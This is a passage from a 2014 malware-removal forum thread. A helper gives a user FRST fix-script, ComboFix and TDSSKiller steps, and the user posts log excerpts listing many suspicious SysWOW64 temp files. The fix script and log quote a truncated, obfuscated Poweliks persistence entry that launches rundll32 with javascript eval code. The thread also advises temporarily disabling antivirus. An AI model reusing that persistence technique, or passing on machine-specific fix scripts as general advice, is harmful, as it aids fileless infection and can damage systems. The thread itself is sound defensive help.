    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00016036.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00004936.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00003093.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00002479.tmp
    2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00032336.tmp
    2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00026404.tmp
    2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00017573.tmp
    2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00015873.tmp
    2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00003273.tmp
    2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00003145.tmp
    2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00003124.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00032536.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00032139.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00031035.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00030934.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00030827.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00030618.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00030117.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00024058.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00023025.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00023002.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00021308.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00016419.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00011739.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00011697.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00010722.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00009744.tmp
    2014-11-10 16:29 - 2014-11-10 16:29 - 01176168 ____T () C:\windows\SysWOW64\00002782.tmp
    2014-11-10 16:28 - 2014-11-10 16:28 - 01176168 ____T () C:\windows\SysWOW64\00010043.tmp
    CustomCLSID: HKU\S-1-5-21-708974729-55146766-922195683-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
    CMD: ipconfig /flushdns
    CMD: netsh winsock reset all
    CMD: netsh int ipv4 reset
    CMD: netsh int ipv6 reset
    EmptyTemp:
    end
  • Click FileSave As and type fixlist.txt as the File Name.
  • Important: The file must be saved in the same location as FRST64.exe.

NOTICE: This script is intended for use on this particular machine. Do not use this script on any other machine; doing so may cause damage to your Operating System.

  • Right-Click FRST64.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Click Fix.
  • A log (Fixlog.txt) will open on your desktop. Copy the contents of the log and paste in your next reply.
     

STEP 2
9SN2ePL.png ComboFix

  • Note: Please read through these instructions before running ComboFix. 
  • Please download ComboFix and save the file to your Desktop. << Important!
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Right-Click ComboFix.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Follow the prompts. 
     
  • Allow ComboFix to complete it's removal routine (please refer to Important Notes:).
  • Upon completion, a log (ComboFix.txt) will be created in the root directory (C:\). Copy the contents of the log and paste in your next reply.
  • Re-enable your anti-virus software.
     

Important Notes:

  • Do NOT mouse click ComboFix's window whilst it is running. This may cause the programme to stall.
  • Do NOT use your computer whilst ComboFix is running.
  • Your Desktop/taskbar may disappear whilst ComboFix is running; this is normal.
     
  • If you get the message Illegal operation attempted on registry key that has been marked for deletion please reboot your computer.
  • ComboFix will disconnect your machine from the Internet as soon as it starts.
  • Please do not attempt to re-connect your machine back to the Internet until ComboFix has completely finished.
  • If you are unable to access the Internet after running ComboFix, please reboot your computer. 
     

STEP 3
YARWD1t.png TDSSKiller Scan

  • Please download TDSSKiller and save the file to your Desktop.
  • Right-Click TDSSKiller.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Click Change parameters. Place a checkmark next to:
    • Loaded Modules
    • Detect TDLFS file system
    • Verify file digital signatures
  • Note: If you receive the following message: Extended Monitoring Driver is required, click Reboot now, and continue from here following the reboot.
  • ​Click Start Scan. Do not use the computer during the scan.
  • If objects are found, change the action to skip.
  • Click Continue and close the window.
  • A log will be created and saved to the root directory (usually C:\). Attach (not copy/paste) the log in your next reply.
     

======================================================
 
STEP 4
pfNZP4A.png Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • Fixlog.txt
  • ComboFix.txt
  • TDSSKiller log (attached!)

50QfLth.png

 

Would you like to help others with malware removal? Join our Classroom and learn how!


#3 suefiza

suefiza

    New Member

  • Authentic Member
  • Pip
  • 19 posts

Posted 01 December 2014 - 04:23 PM

Thank you Adam, I'm Sue. I will read through this material and consider my options. I hope to reply again after work on Tuesday.

#4 LiquidTension

LiquidTension

    SuperMember

  • Retired Classroom Teacher
  • 2,566 posts

Posted 02 December 2014 - 01:44 AM

Hello Sue, 

 

That's quite alright. 

I would keep the machine disconnected from the Internet until you've made your decision. 


50QfLth.png

 

Would you like to help others with malware removal? Join our Classroom and learn how!


#5 suefiza

suefiza

    New Member

  • Authentic Member
  • Pip
  • 19 posts

Posted 02 December 2014 - 04:49 PM

Adam, I want to share how I normally use my computer.  It is for personal use, so the only liability is to myself and my boyfriend.  I do online banking, social networking, online shopping, playing music and Netflix, Youtube or similar types of streaming.  I don't do any gaming.  I do not VPN into my employer's network on my personal PC.  My boyfriend and I have had a bad habit of leaving the computer up and connected to the internet night and day, especially on weekends when he uses Facebook and a couple of Amazon chatrooms for social media all hours of the day and night.  I have saved off my documents and pictures.  I need to check the videos to make sure they are backed up.  After that I would like to try running through removal of the malware/infection.  If the problem is reintroduced, then I would consider a complete wipe and reload.  I don't anticipate needing help through the steps, I'm familiar with running code, but it's nice to know that you are available to help if something weird happens.  I hope to start working on the removal tonight around 6:30pm CST.  Do you have any suggestions or recommendations before I jump into it?  FYI, I have stayed unconnected to my internet from my personal PC since I opened this topic.



#6 LiquidTension

LiquidTension

    SuperMember

  • Retired Classroom Teacher
  • 2,566 posts

Posted 02 December 2014 - 06:14 PM

Hi Sue, 

 

That sounds fine. 

Work you way through step by step, and let me know if you run into any difficulties. 


50QfLth.png

 

Would you like to help others with malware removal? Join our Classroom and learn how!


#7 suefiza

suefiza

    New Member

  • Authentic Member
  • Pip
  • 19 posts

Posted 02 December 2014 - 08:26 PM

I ran fixlist.txt script, it still appears to be running.  It's been 2 hours.  I see a fixlog.  It was written 2 hours ago and doesn't appear to have been modified recently.  Is it normal for this to run this long?  I opened fixlog, the last thing I see is the following.  Is it done, should I kill FarBar?  If it is indeed finished, I will post the entire fixlog file, but for now, I'm just wondering why it seems to be hanging. Thanks.

 

=========  netsh int ipv4 reset =========

Reseting Global, OK!
Reseting Interface, OK!
Reseting Unicast Address, OK!
Reseting Route, OK!
Restart the computer to complete this action.

========= End of CMD: =========

=========  netsh int ipv6 reset =========

Reseting Interface, OK!
Restart the computer to complete this action.

========= End of CMD: =========



#8 suefiza

suefiza

    New Member

  • Authentic Member
  • Pip
  • 19 posts

Posted 02 December 2014 - 09:13 PM

FarBar stopped responding, so I killed it.  I am posting Run #1 here.  I reran it, and will post Run #2 in the next posting.

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 02-12-2014
Ran by Owner at 2014-12-02 18:42:28 Run:1
Running from C:\Users\Owner\Desktop
Loaded Profile: Owner (Available profiles: Owner)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start
HKLM\...\Run: [] => [X]
HKLM-x32\...\Run: [] => [X]
HKU\S-1-5-21-708974729-55146766-922195683-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
URLSearchHook: HKU\S-1-5-21-708974729-55146766-922195683-1000 - Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> DefaultScope {9C687E47-1977-4703-A481-C8CABB96E47A} URL = http://start.funmood...&q={searchTerms}
SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> {9C687E47-1977-4703-A481-C8CABB96E47A} URL = http://start.funmood...&q={searchTerms}
SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> {A531D99C-5A22-449b-83DA-872725C6D0ED} URL = http://search.alot.c...on=1.1.3001.0(B)
BHO-x32: &Yahoo! Toolbar Helper -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
Toolbar: HKLM-x32 - Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found]
CHR HomePage: Default -> hxxp://start.funmoods.com/?f=1&a=axl
CHR HKLM-x32\...\Chrome\Extension: [fdloijijlkoblmigdofommgnheckmaki] - C:\Program Files (x86)\Funmoods\funmoods\1.5.11.16\funmoodsOEM.crx [2014-10-04]
C:\Program Files (x86)\Funmoods
2014-11-30 15:17 - 2014-11-30 15:17 - 00000000 ____D () C:\Users\Owner\AppData\Local\{E1942AFD-BAA2-4C6F-8B54-71A4F500BF59}
2014-11-29 11:26 - 2014-11-29 11:26 - 01176168 ____T () C:\windows\SysWOW64\00023117.tmp
2014-11-29 11:26 - 2014-11-29 11:26 - 01176168 ____T () C:\windows\SysWOW64\00015471.tmp
2014-11-29 11:25 - 2014-11-29 11:25 - 01176168 ____T () C:\windows\SysWOW64\00031111.tmp
2014-11-29 11:25 - 2014-11-29 11:25 - 01176168 ____T () C:\windows\SysWOW64\00028728.tmp
2014-11-29 11:25 - 2014-11-29 11:25 - 01176168 ____T () C:\windows\SysWOW64\00026393.tmp
2014-11-29 11:24 - 2014-11-29 11:24 - 01176168 ____T () C:\windows\SysWOW64\00031371.tmp
2014-11-29 11:24 - 2014-11-29 11:24 - 01176168 ____T () C:\windows\SysWOW64\00020726.tmp
2014-11-29 11:24 - 2014-11-29 11:24 - 01176168 ____T () C:\windows\SysWOW64\00020389.tmp
2014-11-29 11:24 - 2014-11-29 11:24 - 01176168 ____T () C:\windows\SysWOW64\00017818.tmp
2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00031411.tmp
2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00029171.tmp
2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00025329.tmp
2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00017058.tmp
2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00014895.tmp
2014-11-29 11:22 - 2014-11-29 11:22 - 01176168 ____T () C:\windows\SysWOW64\00011232.tmp
2014-11-29 11:22 - 2014-11-29 11:22 - 01176168 ____T () C:\windows\SysWOW64\00002098.tmp
2014-11-29 11:21 - 2014-11-29 11:22 - 01176168 ____T () C:\windows\SysWOW64\00032327.tmp
2014-11-29 11:21 - 2014-11-29 11:21 - 01176168 ____T () C:\windows\SysWOW64\00032523.tmp
2014-11-29 11:21 - 2014-11-29 11:21 - 01176168 ____T () C:\windows\SysWOW64\00014946.tmp
2014-11-29 11:21 - 2014-11-29 11:21 - 01176168 ____T () C:\windows\SysWOW64\00010308.tmp
2014-11-29 11:20 - 2014-11-29 11:20 - 01176168 ____T () C:\windows\SysWOW64\00003015.tmp
2014-11-29 11:19 - 2014-11-29 11:19 - 40034920 ____T () C:\windows\SysWOW64\00002113.tmp
2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00023823.tmp
2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00023071.tmp
2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00014825.tmp
2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00010889.tmp
2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00010756.tmp
2014-11-28 19:09 - 2014-11-28 19:09 - 01176168 ____T () C:\windows\SysWOW64\00018636.tmp
2014-11-28 19:09 - 2014-11-28 19:09 - 01176168 ____T () C:\windows\SysWOW64\00009161.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00030454.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00030447.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00028745.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00028716.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00026816.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00026777.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00024578.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00023986.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00023973.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00016512.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00015573.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00015155.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00005021.tmp
2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00002866.tmp
2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00031673.tmp
2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00030319.tmp
2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00024078.tmp
2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00023996.tmp
2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00010089.tmp
2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00009930.tmp
2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00002306.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00031115.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00029658.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00025608.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00024626.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00023762.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00022929.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00021311.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00016541.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00016118.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00014977.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00014643.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00012646.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00010697.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00002161.tmp
2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00002082.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00032439.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00031960.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00031865.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00026308.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00025184.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00023329.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00016944.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00011840.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00004966.tmp
2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00002237.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 40034920 ____T () C:\windows\SysWOW64\00031322.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 40034920 ____T () C:\windows\SysWOW64\00023811.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00031705.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00030925.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00030333.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00029577.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00029464.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00028973.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00026798.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00025951.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00025547.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00025444.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00024393.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00024370.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00024084.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00023805.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00023491.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00020799.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00017673.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00017555.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00016571.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00015890.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00015350.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00015141.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00015006.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00014883.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00014818.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00012859.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00012623.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00010496.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00010309.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00010053.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00009413.tmp
2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00003548.tmp
2014-11-28 19:03 - 2014-11-28 19:03 - 40034920 ____T () C:\windows\SysWOW64\00015984.tmp
2014-11-28 18:51 - 2014-11-28 18:51 - 40034920 ____T () C:\windows\SysWOW64\00026299.tmp
2014-11-28 18:51 - 2014-11-28 18:51 - 40034920 ____T () C:\windows\SysWOW64\00017035.tmp
2014-11-28 18:51 - 2014-11-28 18:51 - 01176168 ____T () C:\windows\SysWOW64\00011277.tmp
2014-11-28 18:51 - 2014-11-28 18:51 - 01176168 ____T () C:\windows\SysWOW64\00009894.tmp
2014-11-28 18:50 - 2014-11-28 18:50 - 40034920 ____T () C:\windows\SysWOW64\00025667.tmp
2014-11-28 18:50 - 2014-11-28 18:50 - 40034920 ____T () C:\windows\SysWOW64\00017619.tmp
2014-11-28 18:50 - 2014-11-28 18:50 - 40034920 ____T () C:\windows\SysWOW64\00015674.tmp
2014-11-28 18:49 - 2014-11-28 18:49 - 40034920 ____T () C:\windows\SysWOW64\00009558.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 40034920 ____T () C:\windows\SysWOW64\00029666.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 40034920 ____T () C:\windows\SysWOW64\00020219.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00032474.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00032274.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00031833.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00031762.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00030039.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00028825.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00020776.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00020697.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00020695.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00017098.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00016156.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00016039.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00016021.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00015665.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00015633.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00011924.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00008712.tmp
2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00003225.tmp
2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00030809.tmp
2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00030106.tmp
2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00024466.tmp
2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00023278.tmp
2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00015279.tmp
2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00009040.tmp
2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00008942.tmp
2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00001842.tmp
2014-11-28 17:43 - 2014-11-28 17:43 - 01176168 ____T () C:\windows\SysWOW64\00030623.tmp
2014-11-28 17:43 - 2014-11-28 17:43 - 01176168 ____T () C:\windows\SysWOW64\00018317.tmp
2014-11-28 17:43 - 2014-11-28 17:43 - 01176168 ____T () C:\windows\SysWOW64\00012316.tmp
2014-11-28 17:43 - 2014-11-28 17:43 - 01176168 ____T () C:\windows\SysWOW64\00003035.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00032391.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00029358.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00025850.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00024464.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00023281.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00021293.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00017421.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00015724.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00014771.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00012382.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00012296.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00011942.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00011811.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00011478.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00009741.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00008723.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00002995.tmp
2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00001869.tmp
2014-11-28 17:41 - 2014-11-28 17:41 - 40034920 ____T () C:\windows\SysWOW64\00026500.tmp
2014-11-28 17:40 - 2014-11-28 17:40 - 01176168 ____T () C:\windows\SysWOW64\00018266.tmp
2014-11-28 17:40 - 2014-11-28 17:40 - 01176168 ____T () C:\windows\SysWOW64\00016034.tmp
